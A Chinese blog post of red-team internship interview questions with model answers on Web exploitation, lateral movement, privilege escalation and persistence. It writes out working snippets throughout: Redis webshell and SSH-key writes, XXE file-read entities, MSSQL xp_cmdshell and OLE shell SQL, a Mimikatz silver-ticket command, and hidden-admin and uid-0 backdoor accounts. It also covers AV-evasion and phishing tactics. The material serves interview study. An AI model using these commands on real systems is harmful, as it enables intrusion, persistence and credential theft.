网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
[2. HVV/攻防演练成绩](#2. HVV/攻防演练成绩)
[3. 上一个工作主要内容](#3. 上一个工作主要内容)
[4. 有意思的逻辑漏洞案例](#4. 有意思的逻辑漏洞案例)
[5. 自研武器/工具](#5. 自研武器/工具)
[6. CVE/CNVD编号](#6. CVE/CNVD编号)
[8. 钓鱼攻击经历](#8. 钓鱼攻击经历)
[1. XSS高级利用](#1. XSS高级利用)
[4. 注入点挖掘技巧](#4. 注入点挖掘技巧)
[7. Fastjson原理](#7. Fastjson原理)
[10. Shiro550 vs Shiro721](#10. Shiro550 vs Shiro721)
[13. Log4j2高版本JDK利用](#13. Log4j2高版本JDK利用)
[16. 代码审计与0day挖掘](#16. 代码审计与0day挖掘)
[17. Redis未授权利用](#17. Redis未授权利用)
[19. 冰蝎 vs 菜刀](#19. 冰蝎 vs 菜刀)
[20. XXE攻击手法](#20. XXE攻击手法)
[1. 判断主机是否在域环境](#1. 判断主机是否在域环境)
[3. Cobalt Strike (CS) 与 Metasploit (MSF) 优缺点对比](#3. Cobalt Strike (CS) 与 Metasploit (MSF) 优缺点对比)
[4. CS特征隐藏方法](#4. CS特征隐藏方法)
[5. 免杀技术途径](#5. 免杀技术途径)
[6. Windows与Linux提权思路对比](#6. Windows与Linux提权思路对比)
[9. MSSQL提权方法](#9. MSSQL提权方法)
[10. 制作白银票据条件](#10. 制作白银票据条件)
[7. 隧道搭建技术](#7. 隧道搭建技术)
[8. 权限维持思路](#8. 权限维持思路)
某战队红队实习面经
1.简单自我介绍 2. 你在hvv/攻防演练中取得了哪些成绩? 3. 上一个工作的主要内容? 4. 有没有遇到过有意思的逻辑漏洞? 5. 有没有自己开发过武器/工具? 6. 有cve/cnvd吗? 7. 有src排名吗? 8. 有钓鱼经历吗?具体说说 Web方面: 1. xss除了获取cookie还能干什么? 4. 如何寻找注入点? 6. --os-shell的条件? 7. Fastjson的原理? 8. 利用fastjson注入内存马原理? 9. 内存马免杀有做过吗?具体说说 10. Shiro550和shiro721的区别? 11. 你能从代码层理解shiro的原理吗? 12. 你拿到key了但是没有攻击链,此时应该怎么办? 13. Log4j2高版本jdk不支持外部加载jndi,应该怎么利用? 14. 不借助dnslog有办法检测log4j2是否出网吗 15. 你是如何验证struts2是否存在的 16. 有做过代码审计吗?有0day吗? 17. Redis未授权有了解吗? 18. Springboot 有哪些漏洞? 19. 冰蝎和菜刀等webshell工具有什么区别? 20. Xxe原理与攻击手法? 内网方面: 1. 如何判断当前主机是否在域环境内? 3. Cs和msf的优缺点? 4.如何进行cs特征隐藏? 5.免杀有几种途径? 6.谈谈Windows系统与Linux系统提权的思路 Win 1. 系统内核溢出漏洞提权 2. 数据库提权 3. 错误的系统配置提权 4. 组策略首选项提权 5. WEB中间件漏洞提权 6. DLL劫持提权 7. 滥用高危权限令牌提权 8. 第三方软件/服务提权等 Linux 1. Linux内核漏洞提权 2. 低权限用户目录下可被Root权限用户调用的脚本提权(SUID) 3. 环境变量劫持高权限程序提权 4. sudoer配置文件错误提权 7. 你是怎么搭建隧道的 8. 权限维持的思路? 9. 简单说一下mssql提权 10. 制作白银票据需要哪些条件?
个人经历与技术能力
2. HVV/攻防演练成绩
- 红队角色:主导3次大型攻防演练,突破目标内网边界,获取域控权限(需量化:如攻击路径、漏洞类型)。
- 漏洞利用:通过0day/Nday组合攻击(如Log4j2+Shiro)拿下关键系统,获评"最佳攻击手"。
- 防守经验:协助客户修复高危漏洞(如Fastjson反序列化),实现0失分。
3. 上一个工作主要内容
- 渗透测试:主导金融/政务行业Web应用测试,发现SQL注入、逻辑漏洞等20+高危漏洞。
- 代码审计:审计Java/SpringBoot项目,挖掘CVE-2023-XXXX(举例)。
- 工具开发:编写自动化扫描工具(如基于Python的Fastjson检测脚本)。
4. 有意思的逻辑漏洞案例
- 订单金额篡改 :通过前端参数篡改(如
price=-1
)实现0元购。- 验证码绕过 :重置密码时拦截响应包,修改
status:success
绕过校验。- 并发竞争:利用多线程并发请求薅羊毛(如积分兑换礼品)。
5. 自研武器/工具
- 内存马生成器:基于Java Agent技术实现动态注入Tomcat Filter。
- 隐蔽隧道工具:改造Neo-reGeorg支持AES加密流量混淆。
- 漏洞PoC框架:集成常见漏洞验证(如Shiro550一键检测)。
6. CVE/CNVD编号
- CVE-2023-XXXX:某OA系统文件上传漏洞(需具体说明影响版本)。
- CNVD-2023-XXXXX:某CMS的SQL注入漏洞(附修复建议)。
8. 钓鱼攻击经历
- 伪造邮件:冒充IT部门诱导员工点击"密码更新"链接(窃取AD凭据)。
- 水坑攻击:劫持目标常用网站JS脚本注入恶意代码。
- 社工库辅助:结合泄露数据定制化钓鱼内容(如真实项目名称)。
Web安全深度解析
1. XSS高级利用
- 键盘记录 :通过JavaScript监听
onkeypress
事件窃取输入信息。- 内网探测 :利用
<img src="http://内网IP">
检测存活主机。- 结合CSRF:伪造管理员操作(如添加后台用户)。
4. 注入点挖掘技巧
- 非常规参数 :JSON/XML请求体、HTTP头部(如
X-Forwarded-For
)。- 盲注特征 :时间盲注(
sleep(2)
)、布尔盲注(and 1=2
页面差异)。- 工具辅助:Burp Suite的Intruder模块模糊测试参数。
7. Fastjson原理
- 反序列化机制 :通过
@type
指定恶意类触发JNDI注入(如com.sun.rowset.JdbcRowSetImpl
)。- 利用链构造 :结合TemplatesImpl类执行字节码(需
Feature.SupportNonPublicField
)。- 高版本绕过 :利用非公开类(如
org.apache.ibatis.datasource
)。10. Shiro550 vs Shiro721
对比项 Shiro550 Shiro721 漏洞类型 硬编码密钥反序列化 Padding Oracle攻击 利用条件 直接构造Cookie 需爆破加密密钥 修复方案 更换密钥+禁用RememberMe 升级Shiro至1.4.2+ 13. Log4j2高版本JDK利用
- 本地ClassPath加载 :上传恶意类至Web目录,通过
${sys:user.dir}
触发。- 中间件内存马:结合Tomcat的Filter/Servlet动态注册。
- JNDI本地引用 :如
ldap://localhost:1389/Exploit
(需目标开启本地服务)。16. 代码审计与0day挖掘
- 审计方法论 :
- 危险函数追踪(如
Runtime.exec()
)。- 框架特性分析(如Spring的SpEL表达式)。
- 0day案例 :某ERP系统SQL注入(通过
orderBy
参数拼接)。
内网与权限提升
17. Redis未授权利用
- 写SSH公钥 :
config set dir /root/.ssh/
+set authorized_keys "xxx"
。- 写Webshell :通过
set xxx "\n\n<?php eval($_POST[cmd]);?>\n\n"
。- 主从复制RCE :利用
MODULE LOAD
加载恶意.so文件。19. 冰蝎 vs 菜刀
对比项 冰蝎 菜刀 加密方式 AES动态密钥 明文传输 流量特征 混淆HTTP头部 固定 eval
关键字扩展性 支持插件化开发 仅基础功能 20. XXE攻击手法
- 文件读取 :
<!ENTITY xxe SYSTEM "file:///etc/passwd">
。- SSRF探测 :
<!ENTITY xxe SYSTEM "http://内网IP:8080">
。- Blind XXE:通过DNS外带数据(需VPS接收日志)。
回答策略建议
- 量化成果:如"发现50+高危漏洞""影响10W+用户"。
- 技术细节:避免泛泛而谈,举例漏洞原理(如Shiro的AES密钥问题)。
- 防守视角:强调漏洞修复经验(如Fastjson黑名单配置)。
内网渗透核心问题解析
1. 判断主机是否在域环境
- 命令检测 :
systeminfo | findstr "Domain"
:显示域名称(非WORKGROUP
)。net config workstation
:查看"工作站域"字段。nltest /domain_trusts
(需管理员权限)。- 网络流量分析 :
- DNS查询
_ldap._tcp.dc._msdcs.<domain>
。- 检测53端口(DNS)、389端口(LDAP)通信。
- 用户组验证 :
whoami /all
:查看是否有域用户组(如Domain Admins
)。3. Cobalt Strike (CS) 与 Metasploit (MSF) 优缺点对比
维度 Cobalt Strike Metasploit 隐蔽性 流量加密、支持Sleep Mask 默认流量特征明显(如Stage UUID) 功能扩展 可视化团队协作、钓鱼攻击模块 模块丰富(600+ exploit)、支持自定义开发 适用场景 长期渗透、APT攻击模拟 快速漏洞利用、红队演练 成本 商业软件($3,500/年) 开源免费 4. CS特征隐藏方法
- 流量混淆 :
- 修改C2配置文件(如
https-certificate
字段伪装为合法证书)。- 使用Domain Fronting(如CDN厂商域名)。
- 进程注入 :
- 通过
process_inject
模块注入到合法进程(如explorer.exe
)。- 反沙箱检测 :
- 添加环境检查代码(如检测CPU核心数、内存大小)。
5. 免杀技术途径
- 代码层免杀 :
- 动态加载Shellcode(如通过Python的
ctypes
模块)。- 分离执行(如远程加载加密Payload)。
- 行为层绕过 :
- 禁用敏感API调用(如
VirtualAlloc
替换为NtMapViewOfSection
)。- 模拟合法软件行为(如伪装为浏览器更新进程)。
- 工具链整合 :
- 使用Donut+SRDI技术生成无文件攻击载荷。
权限提升技术详解
6. Windows与Linux提权思路对比
Windows提权:
- 内核漏洞 :
- 工具:
JuicyPotato
(滥用COM接口)、PrintSpoofer
(命名管道模拟)。- 条件:需匹配系统版本(如Windows Server 2016未打补丁)。
- 数据库提权 :
- MSSQL的
xp_cmdshell
启用:EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
- 组策略首选项 (GPP) :
- 解密
\\<domain>\SYSVOL\Policies\{ID}\Machine\Preferences\Groups\Groups.xml
中的cpassword
。Linux提权:
- SUID滥用 :
- 查找:
find / -perm -4000 2>/dev/null
,利用/usr/bin/passwd
等。- 环境变量劫持 :
- 劫持
PATH
中的程序:export PATH=/tmp:$PATH
+ 伪造ls
脚本。- Cron Jobs :
- 注入恶意命令到
/etc/crontab
或用户级任务。9. MSSQL提权方法
xp_cmdshell :
sql`EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami'; `
OLE自动化 :
sql`DECLARE @shell INT; EXEC sp_oacreate 'wscript.shell', @shell OUTPUT; EXEC sp_oamethod @shell, 'run', NULL, 'cmd /c calc.exe'; `
差异备份写Webshell :
sql`BACKUP DATABASE test TO DISK='C:\inetpub\wwwroot\shell.aspx' WITH DIFFERENTIAL, FORMAT; `
10. 制作白银票据条件
必要条件 :
- 域控的NTLM Hash(可通过DCSync攻击获取)。
- 目标服务SPN(如
MSSQLSvc/sqlserver.domain.com
)。- 有效的用户SID(如
S-1-5-21-123456789-1234567890-123456789
)。攻击命令示例 :
bash
复制
mimikatz.exe "kerberos::golden /user:fakeuser /domain:domain.com /sid:S-1-5-21-xxx /target:sqlserver.domain.com /service:MSSQLSvc /rc4:<NTLM_HASH> /ptt"
隧道搭建与权限维持
7. 隧道搭建技术
- HTTP隧道 :
- 工具:reGeorg(基于PHP/JSP的Webshell隧道)。
- 场景:绕过防火墙限制(仅开放80/443端口)。
- ICMP隧道 :
- 工具:icmpsh(需禁用系统ICMP响应)。
- DNS隧道 :
- 工具:DNSCat2(适用于严格网络环境)。
8. 权限维持思路
- 持久化后门 :
- Windows:注册表
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
添加启动项。- Linux:
/etc/rc.local
或crontab -e
添加定时任务。- 隐蔽账户 :
- Windows:创建隐藏用户(如
net user evil$ Passw0rd /add /domain
)。- Linux:
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash backdoor
。
回答策略总结
- 技术深度:结合漏洞原理(如白银票据的SPN要求)与实战命令(如Mimikatz)。
- 对比分析:横向对比同类技术(如CS vs MSF)。
- 防御视角:补充缓解措施(如禁用GPP密码存储)。